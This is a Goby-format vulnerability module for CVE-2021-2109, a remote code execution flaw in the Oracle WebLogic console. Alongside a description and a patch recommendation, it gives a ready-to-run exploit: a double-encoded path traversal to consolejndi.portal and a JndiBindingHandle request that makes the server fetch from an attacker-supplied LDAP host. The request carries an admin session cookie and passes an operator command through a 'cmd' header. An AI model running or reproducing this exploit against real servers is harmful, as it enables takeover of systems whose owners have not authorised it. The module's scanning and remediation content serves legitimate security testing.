{ "Name": "Oracle Weblogic LDAP RCE CVE-2021-2109", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "app=\"Oracle-WeblogicPortal\" || app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"", "Description": "Oracle WebLogic Server is the industry leading application server for building enterprise applications using Java EE standards, and deploying them on a reliable, scalable runtime with low cost of ownership. It is strategically integrated with Oracle’s full product and cloud service portfolio. Oracle WebLogic Server provides compatibility with prior versions, and supports new features for developer productivity, high availability, manageability and deployment to cloud native Kubernetes-based environments.", "Product": "Oracle Weblogic", "Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html", "Author": "", "Impact": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts).\nCVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).", "Recommendation": "Apply the Oracle security update that addresses CVE-2021-2109 on all affected WebLogic Server versions, and restrict network access to the administration console (/console) to trusted management hosts.", "References": [ "https://nvd.nist.gov/vuln/detail/CVE-2021-2109" ], "HasExp": true, "ExpParams": [ { "Name": "Cmd", "Type": "input", "Value": "whoami" }, { "Name": "Ldap", "Type": "input", "Value": "ldap://xxx.xxx.xxx;xxx:1389" }, { "Name": "Cookie", "Type": "input", "Value": "ADMINCONSOLESESSION=xxxxx" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/console/css/%252e%252e%252f/consolejndi.portal?", "follow_redirect": true, "header": null, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "JNDI", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)", "follow_redirect": true, "header": { "cmd": "{{{Cmd}}}", "Cookie": "{{{Cookie}}}" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }